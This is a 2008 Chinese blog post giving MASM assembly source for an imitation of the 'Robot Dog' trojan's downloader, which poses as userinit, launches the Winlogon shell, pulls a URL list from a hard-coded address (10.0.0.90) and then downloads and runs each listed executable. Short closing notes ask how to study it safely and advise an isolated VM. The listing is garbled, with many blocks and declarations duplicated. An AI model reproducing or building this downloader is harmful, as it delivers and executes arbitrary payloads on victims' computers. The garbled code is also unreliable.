作者在 2008-06-30 13:07:39 发布以下内容
; Imitation of the "Robot Dog" (机器狗) trojan's infected-file / downloader code
; by naitm (http://hi.baidu.com/naitm)
;
; Build:
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;
; (The published page repeated this header once; the duplicate is collapsed here.)
.386
.model flat,stdcall
option casemap:none
.model flat,stdcall
option casemap:none
; Include 文件定义
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
; 数据段
.data
nThreadCount dd 0
szTempPath db '.',0
szValueName db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0
nThreadCount dd 0
szTempPath db '.',0
szValueName db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0
; 代码段
.code
;以当前进程的STARTUPINFO启动exe文件
_RunIt proc @lpExePath
local @stStartupInfo:STARTUPINFO
local @stProcessInformation:PROCESS_INFORMATION
local @stProcessInformation:PROCESS_INFORMATION
invoke GetStartupInfo,addr @stStartupInfo
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
.if eax == 0
invoke CloseHandle,@stProcessInformation.hThread
invoke CloseHandle,@stProcessInformation.hProcess
.endif
ret
_RunIt endp
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
.if eax == 0
invoke CloseHandle,@stProcessInformation.hThread
invoke CloseHandle,@stProcessInformation.hProcess
.endif
ret
_RunIt endp
;下载文件
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax,eax
mov @nWriteCount,eax
invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
mov @hInternet, eax
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
.if eax != NULL
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
.if eax != NULL
invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite,0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax,@nWriteCount
ret
local @lpbuffer[200h]:BYTE
xor eax,eax
mov @nWriteCount,eax
invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
mov @hInternet, eax
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
.if eax != NULL
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
.if eax != NULL
invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite,0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax,@nWriteCount
ret
_DownloadFile endp
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE
mov @DownTimes,3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
.repeat
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
.if eax != NULL
invoke _RunIt,addr @TempFileName
.break
.else
invoke Sleep,3E8h
dec @DownTimes
.endif
.until (!@DownTimes)
dec nThreadCount
ret
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
.repeat
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
.if eax != NULL
invoke _RunIt,addr @TempFileName
.break
.else
invoke Sleep,3E8h
dec @DownTimes
.endif
.until (!@DownTimes)
dec nThreadCount
ret
_DownloadEXERunIt endp
start:
main proc
main proc
local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local @szWinlogonPath[104h]:BYTE
local @szWinlogonPath[104h]:BYTE
;加载user32.dll,执行LoadRemoteFonts函数 (这函数是干吗的?)
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
invoke GetProcAddress,eax,offset szLoadRemoteFonts
.if eax != NULL
call eax
.endif
.endif
;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
mov @nSizeOfPath,104h
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
invoke _RunIt,addr @szWinlogonPath
invoke RegCloseKey,@hKey
.endif
;检查网络是否连接,不断重试
invoke Sleep,3E8h
.while TRUE
invoke InternetGetConnectedState,addr @nSizeOfPath,0
.break .if eax
.endw
;取一个临时文件名,并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
.break .if eax
.endw
;打开列表文件,验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
mov @hFile,eax
invoke GetFileSize,@hFile,NULL
.if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
.if eax != NULL
mov @hObject,eax
invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
.if eax != NULL
mov @lpBaseAddress,eax
mov esi,eax
BeginDownEXE:
lea edi,@szWinlogonPath
invoke RtlZeroMemory,edi,104h
;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
.repeat
lodsb
.if al == 0Ah
lodsb
.endif
.if al == 0Dh
.if @szWinlogonPath != 0
inc nThreadCount
invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
invoke CloseHandle,eax
invoke Sleep,64h
.endif
jmp BeginDownEXE
.endif
stosb
.until (!al)
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
invoke GetProcAddress,eax,offset szLoadRemoteFonts
.if eax != NULL
call eax
.endif
.endif
;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
mov @nSizeOfPath,104h
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
invoke _RunIt,addr @szWinlogonPath
invoke RegCloseKey,@hKey
.endif
;检查网络是否连接,不断重试
invoke Sleep,3E8h
.while TRUE
invoke InternetGetConnectedState,addr @nSizeOfPath,0
.break .if eax
.endw
;取一个临时文件名,并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
.break .if eax
.endw
;打开列表文件,验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
mov @hFile,eax
invoke GetFileSize,@hFile,NULL
.if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
.if eax != NULL
mov @hObject,eax
invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
.if eax != NULL
mov @lpBaseAddress,eax
mov esi,eax
BeginDownEXE:
lea edi,@szWinlogonPath
invoke RtlZeroMemory,edi,104h
;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
.repeat
lodsb
.if al == 0Ah
lodsb
.endif
.if al == 0Dh
.if @szWinlogonPath != 0
inc nThreadCount
invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
invoke CloseHandle,eax
invoke Sleep,64h
.endif
jmp BeginDownEXE
.endif
stosb
.until (!al)
invoke UnmapViewOfFile,@lpBaseAddress
.endif
invoke CloseHandle,@hObject
.endif
.else
invoke CloseHandle,@hFile
jmp DownloadList
.endif
invoke CloseHandle,@hFile
.else
jmp DownloadList ;无法打开则重新下载
.endif
.endif
invoke CloseHandle,@hObject
.endif
.else
invoke CloseHandle,@hFile
jmp DownloadList
.endif
invoke CloseHandle,@hFile
.else
jmp DownloadList ;无法打开则重新下载
.endif
;不断sleep,直到所有线程结束
.while nThreadCount
invoke Sleep,64h
.endw
invoke ExitProcess,0
.while nThreadCount
invoke Sleep,64h
.endw
invoke ExitProcess,0
main endp
end start
;【Study note】I have not assembled this code yet, because I do not know how to set up a safe environment for virus research (if anyone knows, please reply — much appreciated). There is also one function I still do not understand: LoadRemoteFonts. Why is it called first thing, and can it be removed?
; [Reviewer note] Nothing in this listing explains the LoadRemoteFonts call: it is resolved by name, called with no arguments and its result is ignored, so its purpose cannot be established from the code shown. As for a safe environment: a downloader with a live URL should only ever be examined in an isolated, snapshot-able VM with no host shares and no route to the Internet (or only to a sinkhole you control) — never built or run on a working machine.